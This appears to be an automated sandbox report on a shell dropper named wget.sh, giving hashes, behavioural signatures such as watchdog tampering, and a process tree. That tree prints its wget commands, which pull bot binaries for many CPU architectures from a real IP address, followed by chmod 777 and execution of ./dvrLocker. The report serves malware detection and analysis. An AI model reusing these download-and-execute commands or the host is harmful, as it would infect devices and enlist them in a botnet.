Analysis
-
max time kernel
149s -
max time network
127s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 09:41
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
420B
-
MD5
878878ef9a55d128c2917bfb365e4261
-
SHA1
3f95d013d7602c813cafd4be15c43c37a9c71d2e
-
SHA256
bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a
-
SHA512
dfb89655ef3662bb93b765211863cdff5101a00edf9f45b741e8c401402ec429196cf97b4c4e54dfbfc7153b3c50c2ae9da5e3fab45d51a96f0f25ca6c365cf6
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 807 chmod 815 chmod 738 chmod 742 chmod 746 chmod 764 chmod 785 chmod 803 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /mnt/dvrLocker 739 dvrLocker /mnt/dvrLocker 743 dvrLocker /mnt/dvrLocker 747 dvrLocker /mnt/dvrLocker 766 dvrLocker /mnt/dvrLocker 786 dvrLocker /mnt/dvrLocker 804 dvrLocker /mnt/dvrLocker 808 dvrLocker /mnt/dvrLocker 819 dvrLocker -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog dvrLocker File opened for modification /dev/misc/watchdog dvrLocker -
Renames itself 2 IoCs
pid Process 808 dvrLocker 808 dvrLocker -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 116.203.104.203 -
Reads process memory 1 TTPs 1 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/1/maps dvrLocker -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself telnetd 808 dvrLocker -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 789 wget 806 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.cc wget.sh
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵
- Writes file to tmp directory
PID:709 -
/bin/rmrm -rf dvrLocker2⤵PID:710
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.arm -O -2⤵PID:711
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:738
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
PID:739
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.arm5 -O -2⤵PID:741
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:742
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
PID:743
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.arm6 -O -2⤵PID:745
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:746
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
PID:747
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.arm7 -O -2⤵PID:751
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:764
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
PID:766
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.m68k -O -2⤵PID:769
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:785
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
PID:786
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.mips -O -2⤵
- System Network Configuration Discovery
PID:789
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:803
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
PID:804
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.mipsel -O -2⤵
- System Network Configuration Discovery
PID:806
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:807
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Reads process memory
- Changes its process name
PID:808
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.sh4 -O -2⤵PID:814
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:815
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.powerpc -O -2⤵PID:817
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm -rf /tmp/wget.sh2⤵PID:822
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD5db1a114307c57d7d97acf3dbe1959bf5
SHA1a8a3d0b323ec3229ec2c06a8dfff9486cd987739
SHA256044462feecab936afe4620ee15c24854f1f48d3b18fd5b5d07f1fda274371ead
SHA5125924211f76c6d8a2f88fab8c8f14ec221efd8488de3ca493ec8fd0e5cfb287b2c2563184b406033f37dab9d4121203d22669415ecdf668c2e2e1f5a5c4eb517c
-
Filesize
79KB
MD523eada666ff642f1dbdfb91b93d5c745
SHA170778758af06a219d15a394be128562fee05bbf1
SHA256b0fce4372fdb0be4b7540e592106056cb38caa24056fa3571f0c9b3f40ac006b
SHA5122ec5a1256b5c0891c283114e0b43270cfad3f8fe77871b9163ea2e113025f90e6e1794cc1d16c121abbe173e05f84702e7daa37562befb7d81b20317d293f2df
-
Filesize
54KB
MD5be76a190f3b90d5cb00a5cbc15b112a4
SHA1da8903c31f36952390ff4975683504b9ceff05ea
SHA2569258876ed0aaf0ff28b2b68c5e1ebac8680d7dc8b5de2f67e198035b1f1d545e
SHA5120ef32ef56b4cd888974fc1e900be3956ef23e447b4efb3c1231b11dd77596455b9a5f2927c11f2380308deeb5e97b1a8afd76c350d2d70daea9c1b862934b771
-
Filesize
54KB
MD5e416439abb52454448f56c016daa4dea
SHA1f5dc393e1f8b3859b3e38f38febe78aa5f20e733
SHA256d47579b7e218ac96d3d25c3f3ad2c6a00d2af91b07687a394adfd86cf1d972df
SHA512c92336de627399aca5e3b771b68a51e04338eb79af637776b2e5844868266dd408362c9c0aca5687b9dc6b880fe740fe3dcebcc200bff1ea7e2076ed10cf8b3d
-
Filesize
65KB
MD523c99866e6a90c1aa327cca2078bf089
SHA1a78539835a6c34b0da02c08379c220b708888017
SHA2568da57edc934cf3432607e37dfdfd7c6b461234beaf722ec0b3d49a2aea03191d
SHA5122a6401ed67c460414bcc5a2d721718f615be2e78ac882dfce57460377a19f31ce96162d9e5a40386ddbef4cb71fa9063763d921bc944fc9f756723cb689bb39c
-
Filesize
77KB
MD5d2c3556a910e0370ecd3997cfd8b8f69
SHA1b220577b9ac4ff9a662bd4a66ba3c4fff878c253
SHA25623147675e90639c0bc4d038c3c72cf9191712d730c4eec0c58a7173250fd3ea0
SHA512e6715854ef515cf1537307bc588790f75df7487fe0e28329a425bb616b409f8a0282555bc2367eed6faad074e34043ff4f95b97c441e5ecfa011c177e713cc8c